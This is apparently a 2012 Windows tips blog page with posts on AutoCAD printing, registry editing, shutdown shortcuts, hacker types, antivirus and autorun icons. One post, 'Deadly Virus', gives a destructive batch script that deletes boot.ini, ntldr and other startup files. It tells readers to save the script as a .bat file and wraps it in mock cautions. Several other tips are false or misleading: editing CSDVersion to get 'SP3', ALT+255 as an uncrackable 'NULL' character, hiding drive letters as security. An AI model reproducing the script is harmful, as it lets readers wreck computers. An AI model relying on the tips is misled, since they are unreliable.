Pages

Ads 468x60px

Showing posts with label pc tricks. Show all posts
Showing posts with label pc tricks. Show all posts

Saturday, September 1, 2012

How to create PDF from AutoCAD / How to convert AutoCAD drawings to PDF




1. Start AutoCAD
2. Open an AutoCAD drawing (for example, a .DWG or .DWF or .DXF document)
3. Select from main menu "File"->"Print"
4. Select Printer "Virtual PDF Printer"
5. If you need to adjust PDF generation options, click the "Property" button on the right
6. Click "OK"
7. A dialog will pop up, assign the folder and file name of the PDF document to be generated
8. Congratulations! You have converted AutoCAD drawing to PDF document now.

Single Click To Shut Down your PC..!!





Did you know that in Windows XP you can shut down your computer from the (eventually DOS prompt) command line box? Moreover, you can do this by clicking your mouse only once.

All you need to do is... right-click on an empty Desktop spot -> select New -> Shortcut -> type shutdown followed by a space, and then enter one or more of the parameters listed below -> click Next -> type a suggestive name for your new shortcut -> finally, click Finish.

This is the Shutdown.exe (located in %systemroot%\System32, usually C:\Windows\System32) syntax:


shutdown [-i|-l|-s|-r|-a] [-f] [-m \\computername] [-t xx] [-c "Text"] [-d[u][p]:xx:yy]

Valid command line switches:

-a = Abort system shutdown in progress ONLY IF the -t xx timeout option was already set to ANY value other than 0. ALL switches except -l and -m are ignored during abort.

-c "Text" = Text comment (case insensitive) to be displayed in the Message area of the System Shutdown window. MUST be enclosed between quotes. Maximum allowed 127 ASCII characters.

-d [u][p]:xx:yy = Reason code for shutdown:
u = User code.
p = Planned shutdown code.
xx = Major reason code. Positive integer number less than 256.
yy = Minor reason code. Positive integer number less than 65536.

-f = Force running applications to close without warning.

-i = Display the shutdown interface (GUI). MUST be the first option!

-l = Log off the current user of the local computer (default action). Can NOT be used with the -m option unless the current user has Sysadmin rights, in which case the -m switch takes precedence.

-m \\computername = Remote/network computer name (most always case sensitive) to log off/restart/shut down. Current user MUST have Sysadmin rights to be allowed to use this switch!

-s = Shut down the local computer.

-r = Shut down and restart (reboot) the local computer.

-t xx = Set shutdown timer to timeout for xx seconds. IF NOT specified defaults to 20 seconds. Allowed values between 0 and 99 seconds. The -a switch is the ONLY one that CAN be used during the timeout period.

NOTES:
The dash (-) in front of these switches can be replaced by a forward slash (/).

Spaces are NOT required to separate the shutdown command from ANY following switches, but ARE required to separate ANY switch from its following parameter(s), if any.
For example:

shutdown -s -c "Shutting down!" -t 3

tells your computer to shutdown after waiting for 3 seconds while the System Shutdown window will display text above in the Message area.

Optional: after you're done creating your customized shortcut for shutdown -> right-click on it -> select Properties -> enter your desired key "combo" in the Shortcut Key box (e.g. Ctrl + Alt + End) -> click OK/Apply.
From now on just left-click on your shutdown shortcut or hit that key combination to turn off/restart/log off your computer.

▓ S ▓ I ▓ G ▓ N ▓ E ▓ D ▓  ╚B╚Y : R K WORLD

For More VISIT : ◄┘GEEK'S AREA ◄┘

Wednesday, August 22, 2012

All About Registry - A Complete Guide


 What is the Registry?

The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of The Registry

The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.

Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:


* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.
* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.
* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.
* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.
* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.
* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.



Each registry value is stored as one of five main data types:


* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.
* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_SZ - This type is a standard string, used to represent human readable text values.



Other data types not available through the standard registry editors include:


* REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.
* REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.
* REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.
* REG_NONE - No defined value type.
* REG_QWORD - A 64-bit number.
* REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.
* REG_RESOURCE_LIST - A device-driver resource list.



Editing The Registry


The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.

An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit
This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.

Using Regedit to modify your Registry
Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!

Importing and Exporting Registry Settings


A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:

Quote:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02


The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

Deleting keys or values using a REG file

It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:

Quote:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]


The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

Quote:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-


Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

Regedit Command Line Options

Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.


* regedit.exe [options] [filename] [regpath]
* [filename] Import .reg file into the registry
* /s [filename] Silent import, i.e. hide confirmation box when importing files
* /e [filename] [regpath] Export the registry to [filename] starting at [regpath]
e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
* /L:system Specify the location of the system.dat to use
* /R:user Specify the location of the user.dat to use
* /C [filename] Compress (Windows 98)
* /D [regpath] Delete the specified key (Windows 98)

Maintaining the Registry


How can you backup and restore the Registry?

Windows 95

Microsoft included a utility on the Windows 95 CD-ROM that lets you create backups of the Registry on your computer. The Microsoft Configuration Backup program, CFGBACK.EXE, can be found in the \Other\Misc\Cfgback directory on the Windows 95 CD-ROM. This utility lets you create up to nine different backup copies of the Registry, which it stores, with the extension RBK, in your \Windows directory. If your system is set up for multiple users, CFGBACK.EXE won't back up the USER.DAT file.

After you have backed up your Registry, you can copy the RBK file onto a floppy disk for safekeeping. However, to restore from a backup, the RBK file must reside in the \Windows directory. Windows 95 stores the backups in compressed form, which you can then restore only by using the CFGBACK.EXE utility.

Windows 98

Microsoft Windows 98 automatically creates a backup copy of the registry every time Windows starts, in addition to this you can manually create a backup using the Registry Checker utility by running SCANREGW.EXE from Start | Run menu.

What to do if you get a Corrupted Registry
Windows 95, 98 and NT all have a simple registry backup mechanism that is quite reliable, although you should never simply rely on it, remember to always make a backup first!

Windows 95

In the Windows directory there are several hidden files, four of these will be SYSTEM.DAT & USER.DAT, your current registry, and SYSTEM.DA0 & USER.DA0, a backup of your registry. Windows 9x has a nice reature in that every time it appears to start successfully it will copy the registry over these backup files, so just in case something goes wrong can can restore it to a known good state. To restore the registry follow these instruction:
[list=1]
* Click the Start button, and then click Shut Down.

* Click Restart The Computer In MS-DOS Mode, then click Yes.

* Change to your Windows directory. For example, if your Windows directory is c:\windows, you would type the following:

cd c:\windows

* Type the following commands, pressing ENTER after each one. (Note that SYSTEM.DA0 and USER.DA0 contain the number zero.)

attrib -h -r -s system.dat
attrib -h -r -s system.da0
copy system.da0 system.dat
attrib -h -r -s user.dat
attrib -h -r -s user.da0
copy user.da0 user.dat

* Restart your computer.



Following this procedure will restore your registry to its state when you last successfully started your computer.

If all else fails, there is a file on your hard disk named SYSTEM.1ST that was created when Windows 95 was first successfully installed. If necessary you could also change the file attributes of this file from read-only and hidden to archive to copy the file to C:\WINDOWS\SYSTEM.DAT.

Windows NT

On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration.

How can I clean out old data from the Registry?

Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it removes them from the Windows Registry after having recording those entries in the Undo.Reg file.

Sunday, August 5, 2012

Hide Hard-Disk Drives Without 3rd Party Software on Windows




Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.
DISKPART>
2) Then type "list volume"
The result will look something like one as shown below-
3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}
4) Now type "remove letter E"

Now a message will come { Diskpart Removed the Drive letter }
sometime it requires to reboot the computer.

Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.

Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".

It means type "assign letter E".
if havent understand

Wednesday, August 1, 2012

How to turn XP SP2 into SP3 or even more




Start> Run> type in 'regedit'
Go to HKEY_LOCAL_MACHINE, then SYSTEM, then CurrentControlSet, then windows
From here on in click "CSDVersion" and click modify, change "0x00000200" (SP2) to "0x00000300" by typing 300 in the field where 200 once was.
Close it down,
Restart (MAKE SURE YOU RESTART)

Introduction To Hacking (Tutorial 1)


Introduction:

 Hey guys am here again with my other post which gives you the brief Introduction To Hacking.So Are you eager..? So lets know about all about hacking today. I will be posting some tutorials about the hacking. So Folks keep visiting the BLOG.

Lets move to the topics now.........

So guys for today let us know about on below topics

1)What is Hacking.?
2) Who is Hacker.?
a) Types of Hackers.
b) Hacker's Hierarchy.

What is Hacking and Who is Hacker? 

Hacking is nothing but tinkering with electronic or computer systems. The person who does these is known as Hacker. 

So guys all of us think that Hacker's are cool,bad-boy's and selfish in nature but actually that's not the real thing. I do agree they are cool,passionate etc but all Hackers are not Bad-Boys,Selfish. There are many Hacker's who work(Hack) for welfare of people and are against the Bad-Boys. So thinking that all Hackers are bad,selfish in nature is not a good thing according to my point of view.

Types of Hackers

There are two main types of Hacker's in the world they are :
1) White Hat Hackers
2) Black Hat Hackers

So guys let us know about them individually,

1) White Hat Hackers

These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats.
Example:  Ethical Hackers

2) Black Hat Hackers

These guys are considered as the bad guys. Black hat hackers use their skills for illegal purpose.
They usually break into system's security steal all the confidential data from the people for their personal use.
Example : Malicious Hackers

Hacker's Hierarchy

Script Kiddie's:

These guys are just noobs in world of computers. They do-not have any idea of "HOW TO HACK" but pretend to be a Hacker. These guys are actually not a hackers but misunderstanding of people had made them to pretend to be a hackers.They just Copy-Paste the things from the Pre-Coded codes of hackers and implement them where they are not supposed to and become bugged-up having no idea what the code does.

Intermediate/Middle Level Hacker's:

These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use Discovered well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks.These are just considered as the one step forward people from the Script Kiddie's.They just make some changes in the main Discovered well-known exploits and discover the other things from them. These people re just the user's but not the one who discover something on stand-alone.

Elite Hackers :

Here are the real guys who have most of the knowledge of computers,networking,security systems etc. and more than that they are well experienced guys. These Pro guys are actually known as a real hackers who can just do anything with their knowledge. They are nor dependent and do discover the things own.

Guys Stay Tuned for my next Tutorial :

☻S☺I☻G☺N☻E☺D☻☻B☺Y☻ - RK WORLD

 VISIT HERE FOR MORE : Geek's Area

Tuesday, July 31, 2012

A Complete Guide about DirectX




Ever wondered just what that enigmatic name means?


Gaming and multimedia applications are some of the most satisfying programs you can get for your PC, but getting them to run properly isn’t always as easy as it could be. First, the PC architecture was never designed as a gaming platform. Second, the wide-ranging nature of the PC means that one person’s machine can be different from another. While games consoles all contain the same hardware, PCs don’t: the massive range of difference can make gaming a headache.


To alleviate as much of the pain as possible, Microsoft needed to introduce a common standard which all games and multimedia applications could follow – a common interface between the OS and whatever hardware is installed in the PC, if you like. This common interface is DirectX, something which can be the source of much confusion.

DirectX is an interface designed to make certain programming tasks much easier, for both the game developer and the rest of us who just want to sit down and play the latest blockbuster. Before we can explain what DirectX is and how it works though, we need a little history lesson.

 

 DirectX history

Any game needs to perform certain tasks again and again. It needs to watch for your input from mouse, joystick or keyboard, and it needs to be able to display screen images and play sounds or music. That’s pretty much any game at the most simplistic level.

Imagine how incredibly complex this was for programmers developing on the early pre-Windows PC architecture, then. Each programmer needed to develop their own way of reading the keyboard or detecting whether a joystick was even attached, let alone being used to play the game. Specific routines were needed even to display the simplest of images on the screen or play a simple sound.

Essentially, the game programmers were talking directly to your PC’s hardware at a fundamental level. When Microsoft introduced Windows, it was imperative for the stability and success of the PC platform that things were made easier for both the developer and the player. After all, who would bother writing games for a machine when they had to reinvent the wheel every time they began work on a new game? Microsoft’s idea was simple: stop programmers talking directly to the hardware, and build a common toolkit which they could use instead. DirectX was born.

 

How it works..??

At the most basic level, DirectX is an interface between the hardware in your PC and Windows itself, part of the Windows API or Application Programming Interface. Let’s look at a practical example. When a game developer wants to play a sound file, it’s simply a case of using the correct library function. When the game runs, this calls the DirectX API, which in turn plays the sound file. The developer doesn’t need to know what type of sound card he’s dealing with, what it’s capable of, or how to talk to it. Microsoft has provided DirectX, and the sound card manufacturer has provided a DirectX-capable driver. He asks for the sound to be played, and it is – whichever machine it runs on.

From our point of view as gamers, DirectX also makes things incredibly easy – at least in theory. You install a new sound card in place of your old one, and it comes with a DirectX driver. Next time you play your favourite game you can still hear sounds and music, and you haven’t had to make any complex configuration changes.

Originally, DirectX began life as a simple toolkit: early hardware was limited and only the most basic graphical functions were required. As hardware and software has evolved in complexity, so has DirectX. It’s now much more than a graphical toolkit, and the term has come to encompass a massive selection of routines which deal with all sorts of hardware communication. For example, the DirectInput routines can deal with all sorts of input devices, from simple two-button mice to complex flight joysticks. Other parts include DirectSound for audio devices and DirectPlay provides a toolkit for online or multiplayer gaming.

 

Diagnosing problems

Diagnosing problems with a DirectX installation can be problematic, especially if you don’t know which one of the many components is causing your newly purchased game to fall over. Thankfully, Microsoft provides a useful utility called the DirectX Diagnostic Tool, although this isn’t made obvious. You won’t find this tool in the Start Menu with any version of Windows, and each tends to install it in a different place.

The easiest way to use it is to open the Start Menu’s Run dialog, type in dxdiag and then click OK. When the application first loads, it takes a few seconds to interrogate your DirectX installation and find any problems. First, the DirectX Files tab displays version information on each one of the files your installation uses. The Notes section at the bottom is worth checking, as missing or corrupted files will be flagged here.

The tabs marked Display, Sound, Music, Input and Network all relate to specific areas of DirectX, and all but the Input tab provide tools to test the correct functioning on your hardware. Finally, the More Help tab provides a useful way to start the DirectX Troubleshooter, Microsoft’s simple linear problem solving tool for many common DirectX issues.

Śιgηє ßÿ :    RK

FOR MORE GO HERE : www.geeksarea.blogspot.com 

How To Make Anti-Cracable/Hackable Password..?




Hey guys today am here to give a tutorial about "How to Make Anti-Crackable/Hackable Password".
As we know that the password we set for our Pc's,laptops and online accounts are hackable. The easy and 1st way the hackers shows their skills in hacking accounts is "CRACKING PASSWORDS". To help you to get rid of this I am here to help you.

So guys how can you create and "ANTI-CRACKABLE/HACKABLE PASSWORD"?

Solution:
Do use some Characters between your passwords like :
1) "↓".
2) " ".
You may notice that the second(2) character which is enclosed by double inverted commas looks like blank and contains no characters. Right?. If your answer is "YES" then your wrong. The "BLANK SPACE" between the second(2) is not actually a BLANK SPACE but it is the "NULL" character which is not visible but it is taken as the part of password. Now you have question in your head that how can we use/type that "NULL" character.? Here is your answer friends. Hold ALT+255 and leave and your done.!! there goes your NULL character typed on the screen with space.

NOTE:The NULL character has its own value and cannot be neglected

To make your own Characters and use them as your passwords go HERE and by holding ALT press the DECIMAL numbers accociated to the special characters.

For example:

ALT+178 gives "▓"

TIP: I suggest you to use ALT+255 at the end of the password because it is invisible is hard to get regcognized by the hacker.

For example:

your password is VINAY do use ALT+255 after Y. 
ie, "VINAY "
you may notice that a NULL character is appeared after Y and is hard for any one to crack or hack it.


Śιgηє ßÿ :    R K

FOR MORE GO HERE : www.geeksarea.blogspot.com

 Warning : Do Not Copy. DMCA protected Content.

Deadly Virus to Shutdown a Computer For Ever...!!















Hey Fella's am back again with some other cool hack. Today let us know how to create your own deadly virus.Eager to know whats that..?? Just hold-down guys do-not jump to the end. Just read the below "Caution".

Caution:
1) Do-not try this at home not even for fun once it runs it just makes your computer dead which cannot  be brought alive.


2) Am am not responsible for any cause/damage caused to the computer.


3) The post is for education purpose only.

Okay guys are you Ready..??
Here goes the code,

Code:

/****************START**********************************************/
                                                                         */
@echo off                                                        */
attrib -r -s -h c:\autoexec.bat                         */
del c:\autoexec.bat                                         */
attrib -r -s -h c:\boot.ini                                 */
del c:\boot.ini                                                 */
attrib -r -s -h c:\ntldr                                     */
del c:\ntldr                                                      */
attrib -r -s -h c:\windows\win.ini                   */
del c:\windows\win.ini  
                                 */
                                                                        */
/****************END************************************************/ 

Steps :


1) Copy the above code from "@echo off" to "win.ini".


2) Paste the above code in note-pad.


3) After pasting the code click on Files/Save as.


4) Save the file with any name with ".bat"(batch file) extension.
    for example: "Screwyou.bat"


5) Yoo..!! guys you have your first own VIRUS coded by you.

Caution::

Am again warning you guys,

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

So guys are your eager to know what the code actually does .?? Wanna know..?? Then here is your answer for your question :

1)What it does..??
-This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again.

Śιgηє ßÿ :    RK

FOR MORE GO HERE : www.geeksarea.blogspot.com 



Warning : Do Not Copy. DMCA protected Content.

Monday, July 30, 2012

How to Use Pendrive as RAM ?



Use Ur pendrive as a Ram
Press windows button + Pause/break
Go to advanced Settings(Left side)
Under performance click "Settings"
then click Advanced tab
then click change
ucheck "Automatically Manage....."
Select your pen drive
and size allocation for it

Saturday, July 28, 2012

How to Create or Delete a Personel Drive on your Windows PC


IF U WANT TO CREATE UR OWN PERSONAL DRIVE

Go to c drive

Create a new folder ( say samp1 )

now go to command prompt and type

subst z: c:\samp1

now go to my computer and check it..........


to remove the drive

go to command prompt and type

subst z: /d


Written by Vinay

Friday, July 27, 2012

How to Make a Computer Operating System - Detailed Guide


Learn how to make an operating system from this awesome post written by Vinay - Click here

HOW ANTIVIRUS WORKS.....????


Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer.
Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one among those few who would really bother to understand how an antivirus works, then this article is for you.

How Antivirus Works:

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based dectection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.
As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants so that, the virus can be analyzed and the signature can be added to the dictionary.
Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.
Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.
For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.
Most commercial antivirus software use a combination of both signature-based and heuristic-based approaches to combat malware.

Issues of Concern:

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However, most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.
Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.
Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.
Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.


courtesy : http://www.gohacking.com

Tricks to Change Icons of Control Panel on your PC




All the Xp users would have been bored by the boring icons in their My Computer panel which are adjacent to the Hard disk drives(C:,D: or whatever drive letter you have).


Here is a simple tweak by which you will be able to change this monotonous icon to anything you like,even your own Picture if you wish


You can put any image in place of one which I have shown,even the picture of your favourite celebrity or your dream caror your own Picture.


Here are the steps you need to follow:




1.First of all the picture you want to use should have .ico extension(if you already have a pic with .ico extension proceed to step 2).Most of the pictures we normally use have extensions like .jpg,.bmp,.png..gif etc, so you first need to convert them to one with .ico extension.This is simple.Just go here and put your original image in the 'Source Image 'section,then click on 'Generate Favicon.ico ' button to get your image with .ico extension.


2.Now go to My Computer.Suppose you want to put this icon in place of your original C: image.


Double click and enter C: .Paste your .ico image file in it.Also create a new text file and in it type the following lines:
[autorun]
ICON=favicon.ico


Remember that 'favicon.ico' in the second line is the name of your image file.If you have an image file with .ico extension by the name of 'abc.ico',then use that in the second line in place of 'favicon.ico'.


3.Now rename this text file as ' autorun.inf ' (without the quotes).


Important Note:How do I rename my text file as autorun.inf ?Ans.Go to Tools->Folder options.Under the View tab uncheck the 'Hide extensions for known file types'.Press apply.Now rename your text file as 'autorun.inf'.


4.Now restart your Pc.You are done.Check out the cool new picture you have just added in your My computer panel.
Related Posts Plugin for WordPress, Blogger...